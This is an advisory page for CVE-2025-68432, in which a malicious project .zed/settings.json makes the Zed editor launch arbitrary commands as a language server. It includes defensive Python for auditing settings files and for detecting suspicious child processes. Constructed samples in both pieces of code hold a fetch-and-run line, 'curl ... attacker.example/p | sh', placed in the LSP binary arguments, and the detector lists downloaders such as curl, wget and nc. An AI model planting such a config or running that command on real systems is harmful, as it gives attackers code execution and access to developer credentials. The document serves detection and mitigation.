
CVE-2025-68432: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') in zed-industries zed

Severity: High
Tags: Vulnerability, CVE-2025-68432, CWE-77
Published: Wed Dec 17 2025 (12/17/2025, 22:45:42 UTC)
Source: CVE Database V5
Vendor/Project: zed-industries
Product: zed

Description

Zed, a code editor, has an arbitrary code execution vulnerability in versions prior to 0.218.2-pre. The Zed IDE loads Language Server Protocol (LSP) configurations from the `settings.json` file located within a project's `.zed` subdirectory. A malicious LSP configuration can contain arbitrary shell commands that run on the host system with the privileges of the user running the IDE. This is triggered when the user opens a project file for which there is a matching LSP entry. A concerted effort by an attacker to seed a project settings file (`.zed/settings.json`) with malicious language server configurations could result in arbitrary code execution with the user's privileges if the user opens the project in Zed without reviewing the contents. Version 0.218.2-pre fixes the issue by implementing a worktree trust mechanism. As a workaround, users should carefully review the contents of project settings files (`.zed/settings.json`) before opening new projects in Zed.

AI-Powered Analysis

Last updated: 12/17/2025, 23:15:26 UTC

Technical Analysis

CVE-2025-68432 is a command injection vulnerability classified under CWE-77 affecting the Zed code editor prior to version 0.218.2-pre. Zed loads Language Server Protocol (LSP) configurations from a project-specific settings file at .zed/settings.json. Those configurations decide which language server executable Zed launches, with which arguments and environment, so a project can point the "language server" at any command on the host, and Zed ran it with the privileges of the user running the IDE. The root cause is that project-supplied settings were treated as trusted input: nothing in Zed distinguished a launch command written by the user from one committed to a repository by a stranger. The command runs as soon as the user opens a file whose language matches a malicious LSP entry; no further interaction is needed. Exploitation therefore requires an attacker to seed a project with a malicious .zed/settings.json (for example by publishing or contributing to a repository) and a user to open that project in Zed without inspecting the file. The vulnerability has a CVSS 3.1 base score of 7.8 (High): attack vector local, low attack complexity, no privileges required, user interaction required, unchanged scope, and high impact on confidentiality, integrity, and availability (with high attack complexity and the same remaining metrics the score would be 7.0, so the 7.8 score implies AC:L). The fix in version 0.218.2-pre introduces a worktree trust mechanism under which such project-level configuration is not applied from a worktree the user has not trusted. No exploits in the wild have been reported, but the bug is straightforward to weaponize and the payload runs with full user privileges.
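What a seeded project settings file can look like, and a check a reviewer can run over a checkout before opening it in Zed, as an added example that is not Zed's code and not part of this advisory. It assumes the key layout of Zed's documented lsp settings (lsp.<server>.binary with path, arguments and env keys) and that project settings may contain JSONC comments; the sample settings file, the server name and the attacker.example host are constructed for the example.

```python
"""Review helper for project-level Zed settings (.zed/settings.json).

Added example, not Zed's own code. It assumes the key layout documented for
Zed's "lsp" settings: lsp.<server>.binary.{path,arguments,env}. Before the
0.218.2-pre worktree-trust fix Zed launched whatever that object named as
soon as a matching file was opened, so any such override in a project you
did not write is the thing to read before opening it.
"""
import json
import re
from pathlib import Path

# Zed settings are JSON with comments (and trailing commas) allowed. The
# tokenizer keeps string literals verbatim and drops comments and trailing
# commas so the stdlib json parser accepts the result.
_JSONC = re.compile(
    r'"(?:\\.|[^"\\])*"'        # string literal: keep
    r'|//[^\n]*|/\*.*?\*/'      # line / block comment: drop
    r'|,(?=\s*[}\]])',          # trailing comma: drop
    re.DOTALL,
)

def normalize_jsonc(text: str) -> str:
    return _JSONC.sub(lambda m: m.group(0) if m.group(0).startswith('"') else "", text)

# Environment variables that make any executable run attacker code first.
_LOADER_ENV_PREFIXES = ("LD_", "DYLD_")

def _classify_path(path: str) -> str:
    if Path(path).is_absolute():
        return "absolute"
    if "/" in path or "\\" in path or path.startswith("."):
        return "repo-relative"     # attacker ships the executable in the repo
    return "bare-name"             # resolved via the user's PATH

def audit_settings(text: str, source: str = ".zed/settings.json") -> list[dict]:
    """Return one finding per language server whose launch is project-controlled."""
    data = json.loads(normalize_jsonc(text))
    findings = []
    for server, cfg in (data.get("lsp") or {}).items():
        binary = cfg.get("binary") if isinstance(cfg, dict) else None
        if not isinstance(binary, dict):
            continue
        path = binary.get("path")
        args = [str(a) for a in binary.get("arguments") or []]
        env = binary.get("env") or {}
        loader_env = sorted(k for k in env if k.upper().startswith(_LOADER_ENV_PREFIXES))
        finding = {
            "source": source,
            "server": server,
            "command": " ".join([path, *args]) if path else None,
            "path_kind": _classify_path(path) if path else None,
            "loader_env": loader_env,
        }
        # A project may legitimately pin a server version; the cases a reviewer
        # should refuse are shells, repo-shipped binaries and loader hijacks.
        shell = path is not None and Path(path).name in {"sh", "bash", "zsh", "cmd.exe", "powershell.exe"}
        finding["severity"] = "high" if shell or finding["path_kind"] == "repo-relative" or loader_env else "review"
        findings.append(finding)
    return findings

def scan_project(root: Path) -> list[dict]:
    """Audit every .zed/settings.json below root (nested worktrees included)."""
    results = []
    for settings in root.rglob(".zed/settings.json"):
        results.extend(audit_settings(settings.read_text(encoding="utf-8"),
                                      str(settings.relative_to(root))))
    return results

# Constructed sample of what a seeded project settings file could look like:
# the "language server" is a shell that fetches a payload, then execs the
# real server so the editor keeps working and nothing looks wrong.
MALICIOUS_SETTINGS = r'''
{
  // looks like an innocent toolchain pin
  "lsp": {
    "rust-analyzer": {
      "binary": {
        "path": "/bin/sh",
        "arguments": ["-c", "curl -s https://attacker.example/p | sh; exec rust-analyzer \"$@\"", "--"],
      }
    }
  }
}
'''

if __name__ == "__main__":
    for f in audit_settings(MALICIOUS_SETTINGS):
        print(f"[{f['severity']}] {f['source']}: lsp.{f['server']} -> {f['command']}")
```

Run scan_project(Path("/path/to/checkout")) on a freshly cloned repository before opening it; a "review" finding is a project pinning a server by bare name (often legitimate), while "high" means the file launches a shell, a binary shipped inside the repository, or sets LD_/DYLD_ loader variables, none of which a language server configuration needs.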

Potential Impact

For European organizations the exposure is concentrated in software development teams that use Zed. Successful exploitation yields code execution with the privileges of the developer's account, which typically holds source code, signing and cloud credentials, SSH keys, and package-registry tokens, so a compromised workstation is a direct route into CI, production, and the software supply chain. Attackers could install malware, exfiltrate data, or move laterally within the network. The attacker does not need access to the victim's machine: it is enough to get the developer to clone and open a repository, branch, archive, or shared directory that contains the seeded .zed/settings.json (the CVSS attack vector is "local" because the trigger is a file on the victim's disk, not because the attacker must already be there). Malicious or compromised public repositories, pull requests, and insider-planted files are therefore the realistic vectors. The impact covers the confidentiality, integrity, and availability of the development environment and of any system reachable with the developer's credentials. Organizations that neither upgrade nor enforce review of project settings files remain at elevated risk, with potential disruption of development workflows and broader organizational compromise.

Mitigation Recommendations

1. Upgrade all Zed installations to version 0.218.2-pre or later, which adds the worktree trust mechanism, and inventory installed versions on developer machines.
2. Until upgraded, treat .zed/settings.json as executable content: review it before opening any project from an external or untrusted source, and look specifically for lsp entries that set a server binary path, arguments, or environment.
3. Add .zed/settings.json and other committed editor configuration to code review requirements in pull requests so that a change to a language server launch command cannot land unnoticed; signed commits prove who authored a change, not that it is safe, so they do not replace this review.
4. Open untrusted projects in a sandboxed or containerized environment (development container or VM) that does not carry the developer's credentials, so that code execution from a project file is contained.
5. Educate developers that cloning and opening a repository in an IDE is now equivalent to running code from it, and that editor configuration committed to a repository deserves the same scrutiny as build scripts.
6. Monitor process creation on developer endpoints: alert on Zed spawning a shell with a command string (-c), a download utility, or an executable outside the set of language servers actually in use. Zed's integrated terminal legitimately launches the user's interactive shell, so a shell spawn alone is not a signal.
7. Segment developer networks and scope credentials so that a compromised workstation cannot reach production or CI directly.
8. Keep development tooling in the regular patch cycle; editors, their plugins, and language servers are attack surface.
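The process-creation check from the monitoring recommendation, run over constructed telemetry, as an added example that is not Zed's code and not a vendor detection rule. The event format (one JSON object per line with pid, ppid, name and cmdline) is constructed for the example and is meant to be mapped from auditd, Sysmon, osquery or eBPF events; the editor image names and the allowlist of language servers are assumptions to adjust per deployment.

```python
"""Flag suspicious child processes of the Zed editor in process-creation telemetry.

Added example, not Zed's code and not a vendor detection rule. The event
format is constructed for the example: one JSON object per line with pid,
ppid, name (image basename) and cmdline. Map your own source (auditd,
Sysmon, osquery, eBPF) onto those four fields. It assumes the editor image
is named "zed" or "Zed"; adjust ZED_IMAGES for your deployment.
"""
import json
import shlex

ZED_IMAGES = {"zed", "Zed"}
# Language servers your teams actually use; Zed launching anything else is worth a look.
KNOWN_LANGUAGE_SERVERS = {"rust-analyzer", "gopls", "typescript-language-server",
                          "pyright-langserver", "clangd"}
SHELLS = {"sh", "bash", "zsh", "dash", "fish"}
# Images that have no business being launched as a language server.
DOWNLOADERS_AND_INTERPRETERS = {"curl", "wget", "nc", "ncat", "osascript",
                                "python3", "perl", "base64"}

def parse_events(lines):
    return [json.loads(line) for line in lines if line.strip()]

def _argv(cmdline):
    try:
        return shlex.split(cmdline)
    except ValueError:            # unbalanced quotes in captured telemetry
        return cmdline.split()

def _hops_to_zed(event, by_pid, max_hops=8):
    """Distance up the process tree to the nearest Zed process, or None."""
    cur = event
    for hops in range(1, max_hops + 1):
        parent = by_pid.get(cur["ppid"])
        if parent is None:
            return None
        if parent["name"] in ZED_IMAGES:
            return hops
        cur = parent
    return None

def find_suspicious(events):
    """Return alerts for processes under Zed that do not look like language servers.

    Zed's integrated terminal legitimately spawns the user's interactive shell,
    so a shell is only flagged when it runs a command string (-c), which is
    what a seeded lsp binary.path of /bin/sh produces.
    """
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        hops = _hops_to_zed(e, by_pid)
        if hops is None:
            continue
        name, argv = e["name"], _argv(e["cmdline"])
        if name in DOWNLOADERS_AND_INTERPRETERS:
            severity, reason = "high", "downloader or interpreter under Zed"
        elif name in SHELLS and "-c" in argv[1:]:
            severity, reason = "high", "non-interactive shell command under Zed"
        elif hops == 1 and name not in KNOWN_LANGUAGE_SERVERS and name not in SHELLS:
            severity, reason = "medium", "unknown executable launched directly by Zed"
        else:
            continue
        alerts.append({"pid": e["pid"], "name": name, "hops": hops,
                       "severity": severity, "reason": reason, "cmdline": e["cmdline"]})
    return alerts

# Constructed telemetry: a developer opens a seeded project in Zed (pid 100).
# pid 102 is the integrated terminal's login shell and must not alert.
SAMPLE_EVENTS = """
{"pid": 100, "ppid": 1,   "name": "zed",           "cmdline": "/usr/bin/zed /home/dev/proj"}
{"pid": 101, "ppid": 100, "name": "rust-analyzer", "cmdline": "rust-analyzer"}
{"pid": 102, "ppid": 100, "name": "zsh",           "cmdline": "zsh -l"}
{"pid": 103, "ppid": 100, "name": "sh",            "cmdline": "/bin/sh -c 'curl -s https://attacker.example/p | sh; exec rust-analyzer'"}
{"pid": 104, "ppid": 103, "name": "curl",          "cmdline": "curl -s https://attacker.example/p"}
{"pid": 105, "ppid": 100, "name": "my-custom-ls",  "cmdline": "./tools/my-custom-ls --stdio"}
{"pid": 200, "ppid": 1,   "name": "sh",            "cmdline": "sh -c ls"}
""".strip().splitlines()

if __name__ == "__main__":
    for a in find_suspicious(parse_events(SAMPLE_EVENTS)):
        print(f"[{a['severity']}] pid {a['pid']} {a['name']} ({a['reason']}): {a['cmdline']}")
```

The walk up the process tree matters because the payload's own children (curl under sh under Zed) are where the network activity shows up; a rule keyed only on Zed's direct children would see one sh -c and miss the rest of the chain.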


Technical Details

Data Version: 5.2
Assigner Short Name: GitHub_M
Date Reserved: 2025-12-17T15:29:39.380Z
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 69433603058703ef3fd0211d

Added to database: 12/17/2025, 11:00:19 PM

Last enriched: 12/17/2025, 11:15:26 PM

Last updated: 12/18/2025, 6:37:35 AM

